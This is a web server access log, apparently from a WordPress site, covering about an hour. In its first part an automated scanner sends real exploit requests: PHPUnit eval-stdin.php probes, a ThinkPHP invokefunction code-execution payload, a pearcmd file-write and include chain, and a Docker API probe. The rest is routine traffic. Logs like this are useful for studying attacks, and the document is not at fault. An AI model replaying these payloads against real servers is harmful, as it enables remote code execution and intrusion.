117.72.49.15 - - [02/Oct/2025:22:54:52 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:52 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:52 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:52 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:52 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:52 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:52 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:53 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:53 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:53 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:53 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:53 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:53 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:53 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:54 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 64985 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:54 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:55 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 151919 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:57 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 151919 "-" "libredtail-http"
117.72.49.15 - - [02/Oct/2025:22:54:57 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
36.133.115.36 - - [02/Oct/2025:23:05:38 +0800] "POST /wp-cron.php?doing_wp_cron=1759417538.0263400077819824218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
140.143.98.18 - - [02/Oct/2025:23:05:38 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
140.143.98.18 - - [02/Oct/2025:23:05:42 +0800] "GET / HTTP/1.1" 200 33465 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [02/Oct/2025:23:08:43 +0800] "POST /wp-cron.php?doing_wp_cron=1759417723.0413610935211181640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.195.99 - - [02/Oct/2025:23:08:43 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [02/Oct/2025:23:10:34 +0800] "POST /wp-cron.php?doing_wp_cron=1759417834.4791860580444335937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [02/Oct/2025:23:10:34 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [02/Oct/2025:23:43:18 +0800] "POST /wp-cron.php?doing_wp_cron=1759419798.8289930820465087890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.106.72.178 - - [02/Oct/2025:23:43:19 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [02/Oct/2025:23:49:06 +0800] "POST /wp-cron.php?doing_wp_cron=1759420146.0197000503540039062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
199.45.154.157 - - [02/Oct/2025:23:49:06 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.157 - - [02/Oct/2025:23:49:28 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [02/Oct/2025:23:58:27 +0800] "POST /wp-cron.php?doing_wp_cron=1759420707.3876769542694091796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.242.226.102 - - [02/Oct/2025:23:58:27 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.102 - - [02/Oct/2025:23:58:29 +0800] "GET / HTTP/1.1" 200 39369 "http://36.133.115.36:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"